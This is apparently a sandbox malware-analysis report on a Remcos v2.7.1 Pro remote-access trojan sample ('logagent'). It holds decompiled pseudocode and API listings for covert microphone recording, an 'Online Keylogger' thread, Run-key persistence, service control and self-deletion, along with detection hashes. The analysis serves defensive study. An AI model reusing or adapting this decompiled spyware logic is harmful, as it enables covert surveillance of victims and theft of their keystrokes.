                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • SetEvent.KERNEL32(?), ref: 00411CF8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                  • String ID:
                                  • API String ID: 3236006214-0
                                  • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                  • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401519 Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00401519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				0x41b218->wFormatTag = 1;
				 *0x41b21a = 1;
				 *0x41b21c = 0x1f40;
				 *0x41b226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 =  *0x41b21c; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x41b1d0 = _t20;
				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x41b1a0->lpData = _t10;
				_t11 =  *0x41b1d8; // 0x0
				 *0x41b1a4 = _t11;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				waveInStart( *0x41b210);
				return 0;
			}











                                  0x00401519
                                  0x00401523
                                  0x0040152a
                                  0x0040153c
                                  0x00401545
                                  0x0040154e
                                  0x00401553
                                  0x0040155c
                                  0x00401561
                                  0x0040156a
                                  0x00401571
                                  0x00401578
                                  0x0040157f
                                  0x00401588
                                  0x0040158e
                                  0x00401595
                                  0x004015b7
                                  0x004015bd
                                  0x004015c2
                                  0x004015d5
                                  0x004015dd
                                  0x004015eb
                                  0x004015f0
                                  0x004015fb
                                  0x00401600
                                  0x00401606
                                  0x0040160c
                                  0x00401612
                                  0x00401618
                                  0x00401627
                                  0x00401633
                                  0x0040163d

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                  • atoi.MSVCRT ref: 0040157F
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                  • waveInStart.WINMM ref: 00401633
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 1097200658-0
                                  • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                  • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F153 Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                  • SetEvent.KERNEL32(?), ref: 0040F16D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040F18E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                    • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                    • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                    • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                    • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                    • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                    • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                    • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                    • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID:
                                  • API String ID: 3444260106-0
                                  • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                  • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004117C7 Relevance: 15.1, APIs: 10, Instructions: 61serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004117C7(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t12;
				int _t20;
				void* _t23;
				void* _t24;

				_t20 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x11);
				_t24 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
				if(_t23 != 0) {
					if(ControlService(_t23, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t23,  &_v32);
						} while (_v28 != 1);
						_t12 = StartServiceW(_t23, 0, 0);
						asm("sbb eax, eax");
						_t20 = ( ~_t12 & 0x000000fe) + 3;
					} else {
						_t20 = 2;
					}
					CloseServiceHandle(_t24);
					CloseServiceHandle(_t23);
				} else {
					CloseServiceHandle(_t24);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t20;
			}










                                  0x004117d0
                                  0x004117d6
                                  0x004117e4
                                  0x004117e6
                                  0x004117f4
                                  0x004117f8
                                  0x00411812
                                  0x00411818
                                  0x0041181d
                                  0x00411823
                                  0x0041182c
                                  0x00411834
                                  0x0041183b
                                  0x00411814
                                  0x00411814
                                  0x00411814
                                  0x00411844
                                  0x00411847
                                  0x004117fa
                                  0x004117fb
                                  0x004117fb
                                  0x0041184c
                                  0x00411858

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                  • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10549BD4 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 260registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 1054C61B: TerminateProcess.KERNEL32(00000000,?,10549BE2), ref: 1054C62B
                                    • Part of subcall function 1054C61B: WaitForSingleObject.KERNEL32(000000FF,?,10549BE2), ref: 1054C63E
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 10549CF7
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 10549D07
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 10549D3C
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 10549D4E
                                    • Part of subcall function 105486D0: UnhookWindowsHookEx.USER32(00000000), ref: 105486EE
                                  • _wgetenv.MSVCRT ref: 10549D69
                                    • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 10549F2B
                                  • exit.MSVCRT ref: 10549F32
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Attributes$CreateDeleteExecuteHookModuleNameObjectProcessShellSingleTerminateUnhookWaitWindows_wgetenvexit
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 3812567522-243400593
                                  • Opcode ID: c6b649699b8b5dc46a2b5c7f0e2011479e33f8cd10f62a48fb2ad5eb8340c622
                                  • Instruction ID: 0a8844e6cf5ea517a5c17d45514ddb062cfa07a67f858ba951adaf1db21cd8b8
                                  • Opcode Fuzzy Hash: c6b649699b8b5dc46a2b5c7f0e2011479e33f8cd10f62a48fb2ad5eb8340c622
                                  • Instruction Fuzzy Hash: 53917572900509ABDB00D7E0ED5EAEE7B7CEF84345F648065F902E3090EB755E49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413D3D Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00413D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", "a", __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.1 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                  0x00413d3d
                                  0x00413d49
                                  0x00413d4f
                                  0x00413d57
                                  0x00413d5f
                                  0x00413d63
                                  0x00413d63
                                  0x00413d7c
                                  0x00413d8f
                                  0x00413d95
                                  0x00413d97
                                  0x00413d99
                                  0x00413d9a
                                  0x00413da6
                                  0x00413da8
                                  0x00413db4
                                  0x00413dbe
                                  0x00413dca
                                  0x00413dd3
                                  0x00413dd5
                                  0x00413dd9
                                  0x00413ddd
                                  0x00413de1
                                  0x00413de6
                                  0x00413de9
                                  0x00413df6
                                  0x00413dff
                                  0x00413e01
                                  0x00413e05
                                  0x00413e09
                                  0x00413e0d
                                  0x00413e12
                                  0x00413e15
                                  0x00413e23
                                  0x00413e32

                                  APIs
                                  • AllocConsole.KERNEL32(761B43E0,0041BCB0,00000000), ref: 00413D49
                                  • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                  • freopen.MSVCRT ref: 00413D7C
                                  • printf.MSVCRT ref: 00413E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.1 Pro$CONOUT$
                                  • API String ID: 3419900118-4274912840
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405BC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 45%
                                  			E00405BC0(void* __ecx) {
				char _v5;
				char _v6;
				void* _t8;
				void* _t31;

				_push(__ecx);
				_t31 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					 *((char*)(__ecx + 0x3d)) = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
						E00405156(_t31);
						if( *_t31 == 0) {
							CreateThread(0, 0, E0040526A, _t31, 0, 0);
						}
						CreateThread(0, 0, E00405299, _t31, 0, 0);
					}
					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
					 *(_t31 + 0x28) = _t8;
				}
				return _t8;
			}







                                  0x00405bc3
                                  0x00405bc6
                                  0x00405bce
                                  0x00405be3
                                  0x00405be7
                                  0x00405bef
                                  0x00405bfe
                                  0x00405c12
                                  0x00405c18
                                  0x00405c29
                                  0x00405c2d
                                  0x00405c34
                                  0x00405c40
                                  0x00405c40
                                  0x00405c4c
                                  0x00405c4c
                                  0x00405c58
                                  0x00405c5a
                                  0x00405c5a
                                  0x00405c61

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
